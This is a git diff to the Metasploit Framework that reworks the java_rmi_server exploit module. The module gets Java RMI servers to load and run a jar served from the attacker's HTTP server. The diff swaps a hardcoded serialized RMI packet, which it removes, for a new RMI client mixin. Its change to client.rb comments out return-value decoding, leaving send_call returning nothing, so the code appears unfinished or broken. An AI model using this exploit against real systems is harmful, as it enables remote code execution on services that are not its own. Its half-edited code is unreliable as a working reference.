diff --git a/lib/msf/rmi/client.rb b/lib/msf/rmi/client.rb index 27ff7d85ad..98ebbe2930 100644 --- a/lib/msf/rmi/client.rb +++ b/lib/msf/rmi/client.rb @@ -62,9 +62,9 @@ module Msf nsock = opts[:sock] || sock stream = build_call(opts) nsock.put(stream.encode) - return_data = Rex::Proto::Rmi::Model::ReturnData.decode(nsock) + #return_data = Rex::Proto::Rmi::Model::ReturnData.decode(nsock) - return_data.return_value + #return_data.return_value end end end diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index ca24e3f50f..a97a87fca7 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::Tcp + include Msf::Rmi::Client include Msf::Exploit::Remote::HttpServer def initialize(info = {}) @@ -113,44 +113,27 @@ class Metasploit3 < Msf::Exploit::Remote end def primer + print_status("#{peer} - Sending RMI Header...") connect + begin + send_header + rescue ::RuntimeError + print_error("#{peer} - Filed to negotiate RMI protocol") + disconnect + return + end + # Determine if the instance allows remote class loading + print_status("#{peer} - Sending RMI Call...") jar = rand_text_alpha(rand(8)+1) + '.jar' - old_url = "file:./rmidummy.jar" new_url = get_uri + '/' + jar - packet = gen_rmi_packet - # Java strings in serialized data are prefixed with a 2-byte, big endian length - # (at least, as long as they are shorter than 65536 bytes) - find_me = [old_url.length].pack("n") + old_url - idx = packet.index(find_me) - len = [new_url.length].pack("n") - # Now replace it with the new url - packet[idx, find_me.length] = len + new_url - - # write out minimal header and packet - print_status("#{peer} - Connected and sending request for #{new_url}") - #sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet); - sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet) - - buf = "" - 1.upto(6) do - res = sock.get_once(-1, 5) rescue nil - break unless res - break if session_created? - buf << res + begin + return_data = send_call(call_data: build_gc_call_data(new_url)) + rescue ::RuntimeError + fail_with(Failure::Unknown, "#{peer} - Failed to send RMI Call, anyway JAVA RMI Endpoint detected") end disconnect - - if buf =~ /RMI class loader disabled/ - fail_with(Failure::NotVulnerable, "#{peer} - The RMI class loader is disabled") - end - - if buf =~ /java.lang.ClassNotFoundException/ - fail_with(Failure::Unknown, "#{peer} - The RMI class loader couldn't find the payload") - end - - print_good("#{peer} - Target may be exploitable...") end def on_request_uri(cli, request) @@ -175,20 +158,6 @@ class Metasploit3 < Msf::Exploit::Remote end end - - def gen_rmi_packet - "\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00" + - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + - "\x00\xf6\xb6\x89\x8d\x8b\xf2\x86\x43\x75\x72\x00\x18\x5b\x4c\x6a" + - "\x61\x76\x61\x2e\x72\x6d\x69\x2e\x73\x65\x72\x76\x65\x72\x2e\x4f" + - "\x62\x6a\x49\x44\x3b\x87\x13\x00\xb8\xd0\x2c\x64\x7e\x02\x00\x00" + - "\x70\x78\x70\x00\x00\x00\x00\x77\x08\x00\x00\x00\x00\x00\x00\x00" + - "\x00\x73\x72\x00\x14\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e" + - "\x52\x4d\x49\x4c\x6f\x61\x64\x65\x72\xa1\x65\x44\xba\x26\xf9\xc2" + - "\xf4\x02\x00\x00\x74\x00\x13\x66\x69\x6c\x65\x3a\x2e\x2f\x72\x6d" + - "\x69\x64\x75\x6d\x6d\x79\x2e\x6a\x61\x72\x78\x70\x77\x01\x00\x0a" - end - def autofilter return true end